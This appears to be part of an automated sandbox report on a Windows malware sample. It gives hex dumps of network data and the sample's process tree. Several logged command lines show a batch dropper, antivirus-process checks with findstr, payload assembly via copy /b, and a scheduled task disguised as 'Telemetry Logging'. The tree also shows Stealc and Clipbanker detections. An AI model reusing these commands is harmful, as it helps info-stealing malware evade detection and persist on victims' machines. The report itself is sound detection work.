                                                                                                                                                2024-10-06 20:18:54 UTC8000INData Raw: 76 e6 5a 9b 9d 92 9f fd 46 f1 6f 24 3a 87 da 16 35 72 34 7a 01 e4 12 6f 4a 95 49 6d 69 4f 7a 79 7b c7 d3 bf 19 4b 9a 32 71 db 32 e2 f3 e5 9a 37 2a 4a 15 fd 9a 53 a2 a9 f7 cd 7b 50 1f db f5 ea 22 aa 40 13 66 cb dc 5a 63 f9 91 db 67 b1 aa 1a 19 2b 8a 21 a9 0b 96 44 ad 76 ba f2 ca c0 3b bb 00 c2 7e d1 47 1e 37 95 9c cd 15 5b fe b6 12 ad 40 8d 2c 78 5d 65 a9 55 aa c7 48 c2 05 ae ac b1 5b 2d ef 44 42 e3 d7 9b 34 06 e8 cf a7 2d b6 28 81 d8 ea d8 32 b5 dd 4e 5b 2b 2a 82 d3 c6 e8 90 53 cb 00 49 14 25 a6 28 6b 5c db 9c 49 c4 46 70 53 25 e4 f5 30 36 9d 16 cc 07 d6 af 5c 8d 76 f6 ab 4f 01 3f bf d1 1d 1e 0a 7b 3d 71 b1 76 34 85 6b 11 f5 3a 3c e6 cd dd a0 c1 76 28 62 70 bd 7a 77 58 a8 37 ac 20 10 dd 14 ed 93 ad 1c bd d0 65 11 71 38 cb b3 87 34 c9 98 19 6d 2a 9f d0 e6
                                                                                                                                                Data Ascii: vZFo$:5r4zoJImiOzy{K2q27*JS{P"@fZcg+!Dv;~G7[@,x]eUH[-DB4-(2N[+*SI%(k\IFpS%06\vO?{=qv4k:<v(bpzwX7 eq84m*
                                                                                                                                                2024-10-06 20:18:54 UTC8000INData Raw: 80 ed 6c 45 b6 2f 65 87 95 1e 2e 20 46 21 53 39 46 ac 45 cf cc d9 3a 22 f9 13 42 ac 1a ab 09 b8 68 4c cd 4e 56 6f 44 c2 2b dc e9 c6 ec 74 e3 cd 7e d9 2b ce 5d bd 7d f5 5b 4b 6d c0 ac db 19 81 18 e7 e9 3f 88 f5 95 2d df 71 4d af d9 ad 83 55 d1 00 66 a8 a7 f6 90 c5 2d 43 8e b9 52 59 5a fb fe af aa b0 0d 49 6e 3b 07 cd 64 cd 1e c9 9e f0 91 49 8f 26 7a 75 5f f1 4e 4c 1e 99 d0 ed 25 d8 0e b8 7a 36 b3 67 5e f3 8e 0c ad ce bc a6 de 82 08 36 da 1e 4d f2 87 94 ae f0 47 79 53 1d 0d 88 60 ce ee 19 08 6c 73 e5 e5 7f 22 84 5f 94 77 94 58 2e 90 a6 62 48 78 10 f3 d3 2d 28 5f 2a 0e 76 b3 33 0f 14 ee 78 92 f1 c2 0c c1 e3 6e 8a 99 11 89 d2 5b a8 49 aa 37 09 ce cb ed f3 76 35 52 77 73 86 a7 ee d9 74 ee 36 34 f2 10 4a 1b c5 a0 2c d6 b1 e2 82 02 3f ad a2 29 33 a2 1d f8 bb 7d
                                                                                                                                                Data Ascii: lE/e. F!S9FE:"BhLNVoD+t~+]}[Km?-qMUf-CRYZIn;dI&zu_NL%z6g^6MGyS`ls"_wX.bHx-(_*v3xn[I7v5Rwst64J,?)3}
                                                                                                                                                2024-10-06 20:18:54 UTC8000INData Raw: 6f f5 62 1e 07 0e 66 61 f6 ff 16 f2 14 71 ae df 88 21 2e 23 0d 72 c2 ff 23 e0 e2 c0 a4 37 65 5d 79 18 60 54 cb 41 f8 dd 39 b5 0e f3 f6 13 13 ff c4 8b 38 d3 7d c1 c9 d8 03 37 ed 74 f2 2d 22 70 2f 18 c3 06 d6 fd ff 5c ec 49 a7 00 65 ab ce f7 b7 55 41 f8 27 38 32 ef f9 d9 b7 cd 40 8c a1 58 ec 59 64 ac 0e 6d 9d ec 47 c8 2d 59 d5 f5 57 d6 31 db 12 ba fe 12 d9 d6 5b d4 76 96 c6 87 ba 09 f1 f6 a5 c3 8c 4d e5 31 ab f6 66 dd d5 65 19 29 a8 88 5d 8f ef 84 85 3d e6 de 0d 39 20 8a 92 3f 3c 26 c4 04 13 a8 68 77 0f 54 21 c0 e5 ad 79 d8 91 05 47 75 1a 50 62 55 72 24 5c 53 88 db 04 d7 c9 2f e3 13 13 d9 14 ac 33 ef 91 79 3b 0a d0 32 44 07 ab ff 74 7a cf c5 6e e7 74 01 ea c4 b5 f3 9c 15 79 f2 e6 ca 25 9b 76 7f fc a9 eb 4d cd bb 6a 3d cf a1 d3 fd 8a 55 83 3d 59 a3 72 f8 ea
                                                                                                                                                Data Ascii: obfaq!.#r#7e]y`TA98}7t-"p/\IeUA'82@XYdmG-YW1[vM1fe)]=9 ?<&hwT!yGuPbUr$\S/3y;2Dtznty%vMj=U=Yr
                                                                                                                                                2024-10-06 20:18:54 UTC8000INData Raw: a0 3b 91 43 34 dd 73 87 ad 53 d6 76 e1 9d 3a 9c 6f 56 07 32 fe 7f f9 7d 50 ae c2 d8 ee e3 54 fc 97 90 4b 3d ce 7a 68 c1 62 78 f9 77 46 e6 f9 a3 aa 61 9e d9 e3 01 ef 26 16 18 85 75 a8 cb 90 cc 80 20 f7 63 dc 96 bc 32 77 61 64 60 27 a9 96 af 8f 95 cf 95 dd 4c db 3f 7e b2 ea 99 28 5e 79 f5 cd 0a 03 83 45 7c 76 52 1a d0 d0 f7 a0 fd 8a ad 96 39 39 79 2e 3c ee 00 d6 c8 7c 56 13 63 e0 97 a2 81 54 f2 45 66 c4 4d ec 94 14 28 b9 f5 47 7d c0 6f cd 17 53 f0 19 3a 7d bb 79 d6 75 2b 81 8f be 7a 74 3c 7b 28 ce b2 7a f9 66 41 b3 2b 07 fb 9a d5 d6 ab 6c 8f 95 e6 de 6c cb 23 74 5c 61 c5 57 84 77 eb 0f 18 28 3b 83 ee 82 77 ff 57 13 43 94 f6 1f 9f 42 3d 21 71 d8 4c 2d 44 82 73 94 43 db 7d 38 f4 25 8a ab 49 f9 f8 59 1d ee 44 47 c3 df 75 d1 cb ad 22 4e cf 0b 30 3e c9 f2 c6 58
                                                                                                                                                Data Ascii: ;C4sSv:oV2}PTK=zhbxwFa&u c2wad`'L?~(^yE|vR99y.<|VcTEfM(G}oS:}yu+zt<{(zfA+ll#t\aWw(;wWCB=!qL-DsC}8%IYDGu"N0>X
                                                                                                                                                2024-10-06 20:18:54 UTC8000INData Raw: f8 a9 c7 2e e2 aa 67 05 cf b4 6e ea 55 0d 48 ef ba e8 ef f1 6d df 98 db ca 1c c0 3f b7 ab d7 b6 6b db a1 02 5f 89 fa 11 9d ac 8e fd 24 37 58 76 c0 e8 74 6e b8 c4 2b d1 40 15 d0 17 52 ba 2c 25 f9 ba 61 41 a7 f0 1c e6 f6 f7 1d db 80 1c 1a d3 0c 72 6b 77 b4 22 2b 6c 6e bb 4c 94 98 4e 64 30 55 77 f4 94 04 3d b2 cf 92 ba ce 2a 8d b2 0a d8 12 2d 1b 95 24 54 99 4d a4 94 8c be 5b b6 d8 52 8d 16 89 b6 03 5a 5d a7 79 61 15 e1 a0 a8 83 73 84 df 0f d4 1c 41 b7 72 45 fb 1a 79 60 99 cd 0f 66 ef d5 50 84 2a ef 90 7d 0c 0c 56 49 50 2d d1 85 30 70 4e b8 49 d3 58 62 90 43 18 b2 77 c5 9a 64 7f 2d 28 3d 2e 1d 24 d0 36 61 b2 24 ea 8b e3 0d b6 1d 68 e1 69 46 d6 e1 80 0d 70 f7 12 76 a0 7d 47 ac d1 cd fa 48 fe 31 0d b8 6e 32 9b 0f 43 24 79 bc 73 ea 23 4d 72 d8 aa e3 27 1f 73 72
                                                                                                                                                Data Ascii: .gnUHm?k_$7Xvtn+@R,%aArkw"+lnLNd0Uw=*-$TM[RZ]yasArEy`fP*}VIP-0pNIXbCwd-(=.$6a$hiFpv}GH1n2C$ys#Mr'sr
                                                                                                                                                2024-10-06 20:18:54 UTC8000INData Raw: a6 c4 f8 74 7e de 28 1d d4 ad 2a 8c d1 fa 78 e4 01 cc e8 8e 91 3d eb 9f e4 07 84 2d 85 a1 2c 10 3c 9b 45 5e f8 be 06 f5 48 f9 35 8a 8b 40 a4 c6 ba 65 8a b7 7f 20 8f 90 45 32 f6 33 e4 13 a8 dd f7 5e 8d ef 57 be ac 97 ca d1 59 15 e6 7a 2f df 61 f3 ba fb a9 64 3c 29 bd b6 65 21 77 63 c4 41 dd ee 73 1c ba 74 37 45 8f 03 6b 1f 5e ea 74 36 54 33 bb 98 cb b5 95 74 b8 4a 76 bd e5 a7 c7 17 0b ee 95 1e e5 d4 e0 76 47 71 b8 2d f2 93 d8 10 99 35 57 51 d4 f7 d5 b7 9f 9e e0 8e c0 97 50 0c 7c 2f e3 a1 c4 6b 81 19 88 42 a4 1a 7a 98 88 59 5c aa 7e 48 f5 bc eb 1a f8 39 de a7 c9 ed 44 95 d4 ac 86 4e 59 b2 9c a3 44 2b b3 bd 40 84 7d f6 a6 1f 07 a8 8e 27 a3 b6 a2 42 d4 bd 43 5c 32 92 44 ea 58 f5 75 95 13 86 6a 95 1d bf 3d 89 2e a0 50 a0 ae a3 e3 24 60 5f 4d c6 90 56 05 af 1d
                                                                                                                                                Data Ascii: t~(*x=-,<E^H5@e E23^WYz/ad<)e!wcAst7Ek^t6T3tJvvGq-5WQP|/kBzY\~H9DNYD+@}'BC\2DXuj=.P$`_MV
                                                                                                                                                2024-10-06 20:18:54 UTC8000INData Raw: 4e 6e c7 2d e8 f5 db 03 77 f7 b3 3c e0 cf dc 52 a3 94 b1 bb bf d2 89 2e d1 e2 6d d5 a8 d2 58 ed c1 d8 eb 2c 6c 10 3a 7e 9b bc ee 02 1c d0 a5 1c df 5e b1 93 21 65 9f 9f 5f 99 8a 8d 88 10 c6 ef ba e8 31 fd 4e 44 f2 e5 dd fd 5c 3d 73 88 b4 ac b5 2e 59 60 5c c3 bb 81 76 13 22 d8 40 f8 e1 77 43 b1 49 61 ae 42 16 68 37 f2 17 e7 57 4f 4d 93 2a a7 98 ea eb 44 d7 e0 fe 69 39 2a 28 06 f4 84 0e d9 69 0d 23 16 45 fd 97 69 09 29 0a c4 dd 4e 99 8c 2a ae 88 77 6e 43 5b f8 04 bd e1 95 d9 27 41 95 45 4c bd 6a 8b 03 53 82 7c d1 0a 70 47 e1 48 41 82 2b 31 73 5a 7c 83 80 99 ef 6d b0 6c 74 8f 92 03 82 99 3a d1 28 73 74 69 f1 51 2c 3c 4e 74 c0 49 e8 23 28 b1 38 70 68 a5 d3 9f e4 38 a6 94 82 c5 15 84 ad 4c 8d e8 ff 8a 83 17 e5 fb 5f 58 e5 95 5d 00 e7 82 db 2e 52 c7 6e c9 c1 0b
                                                                                                                                                Data Ascii: Nn-w<R.mX,l:~^!e_1ND\=s.Y`\v"@wCIaBh7WOM*Di9*(i#Ei)N*wnC['AELjS|pGHA+1sZ|mlt:(stiQ,<NtI#(8ph8L_X].Rn


                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Target ID:0
                                                                                                                                                Start time:16:16:16
                                                                                                                                                Start date:06/10/2024
                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1'017'773 bytes
                                                                                                                                                MD5 hash:1E31AE89E90AB1A25E4D578B19154BD7
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:2
                                                                                                                                                Start time:16:16:17
                                                                                                                                                Start date:06/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c move Tag Tag.bat & Tag.bat
                                                                                                                                                Imagebase:0x1c0000
                                                                                                                                                File size:236'544 bytes
                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:3
                                                                                                                                                Start time:16:16:18
                                                                                                                                                Start date:06/10/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:4
                                                                                                                                                Start time:16:16:20
                                                                                                                                                Start date:06/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:tasklist
                                                                                                                                                Imagebase:0xb90000
                                                                                                                                                File size:79'360 bytes
                                                                                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:5
                                                                                                                                                Start time:16:16:20
                                                                                                                                                Start date:06/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:findstr /I "wrsa opssvc"
                                                                                                                                                Imagebase:0xb0000
                                                                                                                                                File size:29'696 bytes
                                                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:6
                                                                                                                                                Start time:16:16:20
                                                                                                                                                Start date:06/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:tasklist
                                                                                                                                                Imagebase:0xb90000
                                                                                                                                                File size:79'360 bytes
                                                                                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:7
                                                                                                                                                Start time:16:16:20
                                                                                                                                                Start date:06/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                                                                                                                Imagebase:0xb0000
                                                                                                                                                File size:29'696 bytes
                                                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:8
                                                                                                                                                Start time:16:16:21
                                                                                                                                                Start date:06/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:cmd /c md 627982
                                                                                                                                                Imagebase:0x1c0000
                                                                                                                                                File size:236'544 bytes
                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:9
                                                                                                                                                Start time:16:16:21
                                                                                                                                                Start date:06/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:findstr /V "VoipBiographiesScholarPorno" Dis
                                                                                                                                                Imagebase:0xb0000
                                                                                                                                                File size:29'696 bytes
                                                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:10
                                                                                                                                                Start time:16:16:21
                                                                                                                                                Start date:06/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:cmd /c copy /b ..\Omissions + ..\Involve + ..\Retro + ..\Official + ..\Network + ..\Unlike + ..\Relates K
                                                                                                                                                Imagebase:0x1c0000
                                                                                                                                                File size:236'544 bytes
                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:11
                                                                                                                                                Start time:16:16:21
                                                                                                                                                Start date:06/10/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:Pct.pif K
                                                                                                                                                Imagebase:0xbc0000
                                                                                                                                                File size:893'608 bytes
                                                                                                                                                MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000002.3807123175.0000000001BE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000003.3594009510.0000000001EB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000003.3593733373.0000000001C2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000003.3594534889.0000000001B2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000002.3806737898.0000000001AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000003.3594226622.0000000001B2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000003.3594226622.0000000001B79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000003.3593810174.0000000001B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000003.3594181599.0000000001AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000002.3804413256.00000000001E1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000003.3593856204.0000000001B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000003.3593733373.0000000001BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 5%, ReversingLabs
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:12
                                                                                                                                                Start time:16:16:22
                                                                                                                                                Start date:06/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:choice /d y /t 5
                                                                                                                                                Imagebase:0x2b0000
                                                                                                                                                File size:28'160 bytes
                                                                                                                                                MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:20
                                                                                                                                                Start time:16:18:56
                                                                                                                                                Start date:06/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\KFCFBFHIEB.exe"
                                                                                                                                                Imagebase:0x1c0000
                                                                                                                                                File size:236'544 bytes
                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:21
                                                                                                                                                Start time:16:18:56
                                                                                                                                                Start date:06/10/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:22
                                                                                                                                                Start time:16:18:57
                                                                                                                                                Start date:06/10/2024
                                                                                                                                                Path:C:\ProgramData\KFCFBFHIEB.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\ProgramData\KFCFBFHIEB.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:4'563'640 bytes
                                                                                                                                                MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000016.00000002.3807704895.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: unknown
                                                                                                                                                • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000016.00000002.3807704895.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: unknown
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 74%, ReversingLabs
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:23
                                                                                                                                                Start time:16:18:57
                                                                                                                                                Start date:06/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                                                                                                                                                Imagebase:0x6c0000
                                                                                                                                                File size:187'904 bytes
                                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:24
                                                                                                                                                Start time:16:18:57
                                                                                                                                                Start date:06/10/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:25
                                                                                                                                                Start time:16:18:58
                                                                                                                                                Start date:06/10/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:4'563'640 bytes
                                                                                                                                                MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000019.00000002.4659046866.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: unknown
                                                                                                                                                • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000019.00000002.4659046866.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: unknown
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 74%, ReversingLabs
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:26
                                                                                                                                                Start time:16:18:59
                                                                                                                                                Start date:06/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                                                                                                                                                Imagebase:0x6c0000
                                                                                                                                                File size:187'904 bytes
                                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:27
                                                                                                                                                Start time:16:18:59
                                                                                                                                                Start date:06/10/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Disassembly

                                                                                                                                                Reset < >

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:17.7%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                  Signature Coverage:20.7%
                                                                                                                                                  Total number of Nodes:1528
                                                                                                                                                  Total number of Limit Nodes:32
